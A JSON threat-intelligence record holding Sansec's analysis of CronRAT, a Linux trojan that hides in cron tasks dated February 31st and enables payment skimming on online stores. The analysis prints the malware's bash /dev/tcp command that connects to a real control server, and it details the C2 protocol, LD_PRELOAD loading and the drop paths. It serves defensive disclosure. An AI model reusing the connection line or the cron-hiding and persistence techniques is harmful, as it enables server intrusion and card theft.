{
	"id": "a56fdca2-827b-48f2-a793-3d74c3eabdf7",
	"created_at": "2026-04-06T00:16:47.020235Z",
	"updated_at": "2026-04-10T03:32:46.215976Z",
	"deleted_at": null,
	"sha1_hash": "76b6e72b5508cee39eddaea84631c13bdbe8c159",
	"title": "CronRAT malware hides behind February 31st",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 410754,
	"plain_text": "CronRAT malware hides behind February 31st\r\nBy Sansec Forensics Team\r\nArchived: 2026-04-05 14:10:46 UTC\r\nAt this time of year we typically see a surge in eCommerce attacks and new malware. Last week we analyzed a clever malware attacking online stores, and today we expose another, much more sophisticated threat. It is a Remote Access Trojan (RAT) and we have named it CronRAT.\r\nSansec found CronRAT to be present on multiple online stores, among them a nation's largest outlet. Because of its novel execution, we had to rewrite part of our eComscan algorithm in order to detect it. CronRAT is currently undetected by other security vendors.\r\nCronRAT's main feat is hiding in the calendar subsystem of Linux servers (\"cron\") on a nonexistent day. This way it will not attract attention from server administrators, and many security products do not scan the Linux cron system.\r\nCronRAT facilitates persistent control over an eCommerce server. Sansec has studied several cases where the presence of CronRAT led to the injection of payment skimmers (aka Magecart) in server-side code.\r\nSansec director of threat research Willem de Groot observes:\r\nDigital skimming is moving from the browser to the server and this is yet another example. Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. 
Security professionals should really consider the full attack surface.\r\nCronRAT's stealth capabilities pose a serious threat to Linux eCommerce servers:\r\nFileless execution\r\nTiming modulation\r\nAnti-tampering checksums\r\nControlled via binary, obfuscated protocol\r\nLaunches tandem RAT in separate Linux subsystem\r\nControl server disguised as \"Dropbear SSH\" service\r\nPayload hidden in legitimate CRON scheduled task names\r\nTechnical analysis\r\nhttps://sansec.io/research/cronrat\r\nPage 1 of 4\n\nCronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3. These lines are syntactically valid, but would generate a runtime error when executed. However, this will never happen, as they are scheduled to run on February 31st. Instead, the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding.\r\nThe actual payload (see raw and annotated copy) is a sophisticated Bash program that features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server. As one security engineer remarks:\r\nI thought I had mastered bash, but that script is giving me a headache😅\r\n— アルミ (@schrotthaufen) November 25, 2021\r\nUpon launch, it contacts the control server using an uncommon method for TCP communication:\r\neval \"exec 3\u003c\u003e/dev/tcp/796077735/$((0x1bb))\" \u0026\u003e/dev/null || exit_with_code 5\r\nThis resolves to port 443 on 47.115.46.167, an Alibaba-hosted IP. This service generates a banner for the Dropbear SSH service, which is commonly installed on embedded devices. However, this is clearly a disguise. CronRAT implements a custom binary protocol with random checksums to avoid detection by firewalls and packet inspectors.\r\nOnce a connection with the C\u0026C server is established, CronRAT takes these steps:\r\n1. 
Discards the fake SSH-2.0-dropbear_2017.75 banner.\r\n2. Sends a password, the cio command and then (presumably) a host identifier.\r\n3. Waits for an sd (self-destruct) or ev (eval) command from the control server.\r\n4. Sends the prm command and password/identifier, then receives command parameters for the sidekick RAT.\r\n5. Sends the dwn command and receives a malicious dynamic library.\r\n6. The library is saved to one of these paths: /dev/shm, /run/user/UID, /tmp, /var/tmp, HOME, with one of these file names: www-shared, server-worker-shared, sql-shared, php-shared, systemd-user.lock, php.lock, php-fpm.lock, www-server.lock, php_sess_RANDOM, zend_cache___RANDOM, php_cache, www_cache, worker_cahce (sic), logo_edited_DATE.png, user_edited_DATE.css, custom_edited_DATE.css.\r\n7. Runs the custom prm command with the custom library loaded via LD_PRELOAD.\r\n8. Monitors the custom command for 5 seconds and, depending on success, sends the ssc, ser or sun command.\r\n9. Finishes with the cex command.\r\nThis essentially allows the RAT operator to run any code.\r\nComing up\r\nIn order to study the control server's behavior, we wrote a specially crafted RAT client to intercept commands. And we tricked the C2 server into sending us yet another RAT, which manages to embed itself in the Nginx web server process. Read about NginRAT.\r\nWe greatly appreciate the help of Cipriano Groenendal at Hypernode for providing malware samples and valuable analysis.\r\nSource: https://sansec.io/research/cronrat",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sansec.io/research/cronrat"
	],
	"report_names": [
		"cronrat"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434607,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/76b6e72b5508cee39eddaea84631c13bdbe8c159.pdf",
		"text": "https://archive.orkl.eu/76b6e72b5508cee39eddaea84631c13bdbe8c159.txt",
		"img": "https://archive.orkl.eu/76b6e72b5508cee39eddaea84631c13bdbe8c159.jpg"
	}
}